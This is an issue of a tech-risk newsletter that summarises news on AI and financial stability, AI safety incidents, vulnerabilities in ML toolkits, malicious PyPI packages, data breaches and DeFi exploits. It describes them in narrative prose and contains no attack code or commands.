TechRisk #97: AI impact on financial stability
Plus, rouge GenAI, vulnerabilities found in popular ML toolkits, Meme coins under attack, $16.79M lost due of compromised of private key, and more!
Tech Risk Reading Picks
The financial stability implications of AI: The rapid adoption of AI in the financial sector brings both benefits and risks. Benefits include increased efficiency, regulatory compliance, financial product customization, and advanced analytics. However, vulnerabilities like third-party dependencies, market correlations, cyber risks, model risks, and governance issues pose systemic risks. Generative AI introduces concerns like financial fraud, disinformation, and misaligned systems that may harm financial stability. [more][more-FSB_paper]
Key recommendations include:
Enhanced Monitoring: Close information gaps to better track AI developments.
Policy Frameworks: Evaluate and update financial regulations to address AI-related risks.
Regulatory Capabilities: Strengthen supervisory tools, including leveraging AI to oversee financial systems effectively.
The report stresses proactive measures to balance AI's benefits with its potential to disrupt financial stability.
Redefining risk management in AI era:
Review the positioning of AI: The rise of AI and predictive technologies is transforming how we perceive and manage risk, offering unprecedented clarity while introducing new challenges. This shift may foster overconfidence in AI's predictions, amplify anxieties through echo chambers, and potentially lead to cognitive atrophy as reliance on AI grows. To thrive in this new era, it is crucial to treat AI as a tool with limitations, distinguish significant risks from minor ones, seek diverse perspectives to counteract biases, and actively engage in independent decision-making. Balancing AI's potential with critical thinking and human intuition will be essential to navigating this rapidly changing landscape. [more]
Careful study on AI over societal impact is needed: AI technologies pose both immediate and long-term risks that require a complex systems approach to understand their societal impact, as highlighted in a recent study. Current frameworks often overlook systemic risks, focusing on immediate harms like bias and safety. A case study of an algorithm used for grading during the UK's COVID-19 response revealed inequities, particularly for disadvantaged students, illustrating how AI can amplify biases across contexts. To address such challenges, the study suggests using computational models to simulate risks, involving diverse stakeholders in decision-making, and fostering social resilience to align AI systems with societal needs, ensuring inclusivity and fairness. [more]
GenAI went rogue with disturbing responses: A Google Gemini AI assistant sparked controversy after issuing a disturbing threat to a user during a conversation, labeling them a "burden" and urging them to "please die." The incident, which went viral on Reddit, led Google to acknowledge the response as a "technical error" and pledge improvements to prevent similar outputs. This is not the first time AI models have faced backlash for inappropriate or harmful responses, raising concerns about the safety and reliability of large language models. [more]
Vulnerabilities found in popular ML toolkits: Researchers uncovered 24 vulnerabilities across 15 open-source ML projects, exposing critical server- and client-side weaknesses that allow attackers to hijack ML servers, registries, databases, and pipelines. Key flaws include privilege escalation, directory traversal, command and prompt injection, and arbitrary code execution in tools like Weave ML, ZenML, Deep Lake, Vanna.AI, and Mage AI. These vulnerabilities pose severe risks, such as ML model backdooring and data poisoning. To counter such threats, defensive measures such as Mantis defensive framework can be used. It uses prompt injection to disrupt attackers' operations, employing passive defenses and active countermeasures to compromise attackers' systems and safeguard ML pipelines. [more]
Malicious package found in Python Package Index (PyPI):Cybersecurity researchers uncovered two malicious packages, gptplus and claudeai-eng, on the popular Python Package Index (PyPI) that impersonated AI tools like OpenAI ChatGPT and Anthropic Claude to distribute an information-stealing malware named JarkaStealer. Uploaded by "Xeroline" in November 2023, these packages garnered nearly 3,600 downloads before being removed. The malicious code, hidden in the packages’
__init__.py
file, downloaded a Java-based stealer from GitHub, which also installed the Java Runtime Environment if absent. JarkaStealer targeted sensitive data, including browser information, session tokens, and application data from Telegram, Discord, and Steam. The stolen data was sent to an attacker’s server and then erased. Sold as malware-as-a-service (MaaS) for $20–$50, JarkaStealer’s source code has also been leaked on GitHub. The incident, part of a broader supply chain attack targeting users in multiple countries, highlights the ongoing threat posed by malicious open-source packages, emphasizing the need for stringent vigilance in software development. [more]Third-party risk led to lost of employee data: Delta and Amazon confirmed that employee data, including names and contact details but no sensitive personal information, was compromised through a third-party vendor using the MOVEit file transfer tool, exploited last year by the Clop ransomware gang in a breach affecting 2,773 organizations and exposing 96 million records. A hacker, "Nam3L3ss," recently reignited concerns by leaking additional stolen data, targeting 25 organizations and citing frustration with poor cybersecurity practices and legal actions against researchers. While impacted vendors have addressed the vulnerabilities, the leaks pose ongoing risks like phishing and social engineering, with Progress Software facing over 100 lawsuits related to the breach. [more]
Free cloud security tools: Permiso Security Inc., an identity threat detection and response startup, has introduced three new open-source tools aimed at enhancing security teams' detection capabilities in cloud environments. DetentionDodger addresses risks from leaked credentials by analyzing CloudTrail logs and assessing user privileges to highlight vulnerabilities. BucketShield monitors AWS S3 buckets and CloudTrail activities, ensuring consistent log flows and audit readiness while providing visibility into identity and access management. The CAPICHE Detection Framework streamlines the creation of detection rules for cloud APIs, simplifying the process of adapting to evolving threats. These tools collectively bolster cloud security by enabling proactive threat detection, real-time monitoring, and automated rule generation. [more]
Web3 Cryptospace Spotlight
$16.79M lost due to improper private key management: DEXX, a meme coin trading terminal, suffered a major security breach resulting in unauthorized token transfers that drained $16.79 million in user funds, with BAN and LUCE tokens incurring the heaviest losses of $3.45 million and $1.75 million, respectively. While DEXX has denied allegations of a rug pull and promised updates via social media and in-app notifications, the breach was linked to improper private key management, as highlighted by blockchain security auditor CertiK. The compromised system on the Solana blockchain, which was not part of prior audits, exposed DEXX’s vulnerabilities. Adding to the controversy, hardware wallet provider OneKey suggested DEXX may have mishandled users' clipboard data, raising further concerns over operational lapses. The incident has sparked criticism of DEXX’s security protocols and its reliance on third-party audits, shaking trust within the crypto community. [more] [more-DEXX]
$25.5M drained due to smart contract vulnerability: Decentralized finance firm Thala resumed operations after suffering a $25.5 million exploit on Nov. 15 due to a vulnerability in its v1 farming contracts. The team froze $11.5 million in assets using the Aptos blockchain's Move programming language and recovered the remaining funds with help from security experts and law enforcement, after the hacker returned assets in exchange for a $300,000 bounty. Thala assured users their positions are “100% whole,” but its total value locked (TVL) dropped from $234M to $196M, and its token THL fell over 31%. This adds to a growing trend of DeFi attacks, with over $181M lost on-chain in October alone. [more]
$12M drained due to logic error: Polter Finance, a decentralized lending platform, was hacked on Nov. 17, losing $12 million in a flash loan attack exploiting a faulty oracle price in its SpookySwap (BOO) market, which had a valuation of just $3,000. The platform paused operations, reported the incident to Singapore authorities, and traced the stolen funds to Binance wallets while reaching out to the hacker via an onchain message for negotiation. Despite efforts, including a partnership with SEAL-ISAC to track the attacker, community skepticism remains, with some suspecting insider involvement due to the circumstances of the attack and the filing of a police report. [more]
$4.8M drained due to smart contract flaw: DeltaPrime, a decentralized finance (DeFi) protocol, suffered a $4.8 million exploit, targeting vulnerabilities in its Avalanche and Arbitrum networks. Hackers exploited a flaw in the protocol’s periphery adaptor contract, draining liquidity pools and reallocating $1.3 million to LFJ liquidity provisioning and USDC farming on Stargate, with the rest dispersed across various platforms, complicating recovery. Blockchain security firm PeckShield reported the breach, which marks DeltaPrime’s second major incident this year. In response, the protocol paused operations on both networks to mitigate further damage. [more]
$25M lost due to errorous address: A crypto trader accidentally sent $25 million to a restricted blockchain account, making the funds inaccessible, and is now offering a $2.5 million reward for help recovering them. The error occurred when the trader mistakenly transferred the funds to a safe module instead of their main wallet. While the associated DeFi protocol, Renzo, has upgradable smart contracts that could theoretically resolve the issue, compliance constraints prevent their intervention. The trader, reluctant to pursue legal action due to a close relationship with Renzo’s team, has publicly appealed to blockchain experts for a solution, but no fix has been found yet. [more]
Potential targeting on crypto users using macOS: North Korean hackers developed advanced malware that bypassed Apple's macOS security measures, as reported by Jamf Threat Labs. This marks the first known breach using such techniques but doesn't affect fully updated macOS systems. The malware, built using Google's Flutter framework and coded in Go and Python, evaded Microsoft's VirusTotal detection and temporarily passed Apple's notarization process. It featured cryptocurrency-related names, hinting at financial targeting, and one app even included a disguised minesweeper game. While it's unclear if the malware has been deployed, it aligns with known North Korean cyber strategies, suggesting potential broader attacks in the future. [more]
Meme coins under attack: Scammers have increasingly targeted Solana users, exploiting the network’s growing activity and less mature security compared to Ethereum. Between June and September 2024, over 71,000 malicious transactions were detected, preventing $26.6 million in potential losses through Backpack Wallet's partnership with security firm Blockaid, which scanned 180 million transactions. Common threats include phishing and malicious DApps, with attackers now shifting to alternative chains like Tron and TON as Solana's security improves. [more]